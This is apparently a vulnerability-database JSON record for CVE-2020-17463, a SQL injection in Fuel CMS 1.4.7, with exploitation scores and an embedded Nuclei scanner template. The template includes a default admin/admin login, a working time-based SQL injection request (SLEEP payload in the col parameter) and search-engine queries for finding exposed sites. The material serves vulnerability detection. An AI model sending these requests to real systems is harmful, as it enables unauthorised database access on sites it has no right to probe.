{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2020-17463/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2020-17463/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2020-17463/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2020-17463/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2020-17463/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2020-17463"},"sightings":{"href":"/api/v1/sightings/cve-2020-17463"}},"enrichments":{"cisa-kev":{"kev":true},"epss":{"epss":0.89689,"kev":true,"percentile":0.99782},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2020/CVE-2020-17463.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2020-17463\n\ninfo:\n  name: Fuel CMS 1.4.7 - SQL Injection\n  author: Thirukrishnan\n  severity: critical\n  description: |\n    FUEL CMS 1.4.7 allows SQL Injection via the col parameter to /pages/items, /permissions/items, or /navigation/items.\n  impact: |\n    Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.\n  remediation: Fixed in version 115\n  reference:\n    - https://www.exploit-db.com/exploits/48741\n    - https://nvd.nist.gov/vuln/detail/CVE-2020-17463\n    - http://packetstormsecurity.com/files/158840/Fuel-CMS-1.4.7-SQL-Injection.html\n    - https://getfuelcms.com/\n    - https://cwe.mitre.org/data/definitions/89.html\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2020-17463\n    cwe-id: CWE-89\n    epss-score: 0.89689\n    epss-percentile: 0.99782\n    cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.7:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: thedaylightstudio\n    product: fuel_cms\n    shodan-query: http.title:\"fuel cms\"\n    fofa-query: title=\"fuel cms\"\n    google-query: intitle:\"fuel cms\"\n  tags: time-based-sqli,cve,cve2020,packetstorm,sqli,fuel-cms,kev,thedaylightstudio,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /fuel/login/ HTTP/1.1\n        Host: {{Hostname}}\n      - |\n        POST /fuel/login/ HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        Referer: {{RootURL}}\n\n        user_name={{username}}&password={{password}}&Login=Login&forward=\n      - |\n        @timeout: 10s\n        GET /fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1\n        Host: {{Hostname}}\n        X-Requested-With: XMLHttpRequest\n        Referer: {{RootURL}}\n\n    payloads:\n      username:\n        - admin\n      password:\n        - admin\n    attack: pitchfork\n    matchers:\n      - type: dsl\n        dsl:\n          - 'duration>=6'\n          - 'status_code_3 == 200'\n          - 'contains(body_1, \"FUEL CMS\")'\n        condition: and\n# digest: 4a0a00473045022100cc0cf1ad1e0769639bb06dad43a5575dcbcc9c296b9dcf65b9436b1d59b7ff5e0220491e1e7e30fd6c48fd39e0300c18285c6e3deaf676ae2f7eece13e88b17ec967:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2020-17463"}